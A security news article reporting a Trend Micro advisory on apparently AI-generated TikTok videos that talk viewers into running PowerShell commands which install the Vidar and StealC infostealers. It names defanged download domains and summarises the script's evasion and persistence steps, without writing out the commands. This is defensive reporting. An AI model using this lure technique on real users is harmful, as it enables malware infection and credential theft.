- '코트 안팎에서 데이터와 AI 활용하기'··· NBA팀 올랜도 매직의 디지털 여정
- Phone theft is on the rise - 7 ways to protect your device before it's too late
- 최형광 칼럼 | 데이터는 더 이상 정제되지 않는다
- New Intel Xeon 6 CPUs unveiled; one powers rival Nvidia’s DGX B300
- First $1B business with one human employee will happen in 2026, says Anthropic CEO
AI-Generated TikTok Videos Used to Distribute Infostealer Malware
A new malware campaign has been observed using TikTok’s viral nature and vast user base to spread information-stealing malware such as Vidar and StealC.
According to a new advisory by Trend Micro, this latest social engineering effort marks a shift from traditional malicious tactics, exploiting the platform’s reach and user trust to spread harmful software via seemingly innocuous video content.
TikTok Videos Deliver Malware via PowerShell
Unlike previous campaigns that depended on malicious websites and JavaScript injections, this attack operates entirely within TikTok.
The campaign features short-form videos, likely created with AI tools, that instruct users to execute PowerShell commands. These commands, presented as methods to activate popular software like Microsoft Office or Spotify, initiate a malware infection chain.
What sets this tactic apart is its use of verbal and visual guidance in the videos. The commands are never embedded in text or links, making them harder for traditional security systems to detect. Viewers are coaxed into typing the commands themselves, making them unwitting participants in the malware installation.
Trend researchers traced the campaign to accounts including @gitallowed, @zane.houghton and @digitaldreams771.
These accounts, now inactive, published similar AI-voiced videos with minor variations in camera angles and payload URLs, suggesting automation was used in their creation.
One video in particular gained nearly 500,000 views and over 20,000 likes. Its popularity indicates significant user interaction, increasing the risk that many followed the instructions and infected their systems.
The malware chain begins by using PowerShell to download a script from allaivo[.]me, which then fetches and installs Vidar or StealC.
The malicious PowerShell script:
- Hides files in user directories and adds them to Windows Defender’s exclusion list
- Downloads malware from amssh[.]co
- Uses retry logic to ensure execution
- Sets up system persistence
- Cleans up forensic evidence to avoid detection
Vidar further masks its command-and-control (C2) infrastructure by embedding IP data in services like Steam and Telegram.
A Call for Smarter Defenses
According to Trend Micro, the campaign highlights the urgent need for updated defense strategies that go beyond traditional threat detection.
Organizations should actively monitor social media platforms for high-engagement posts that contain technical instructions, as these may be linked to malicious activity.
Implementing behavioral detection tools is also essential to flag unusual user actions, such as unexpected command-line executions.
Additionally, user education must evolve to include guidance on recognizing and reporting deceptive video content, especially those that exploit social engineering tactics through visual and auditory cues.
Image credit: BongkarnGraphic / Shutterstock.com
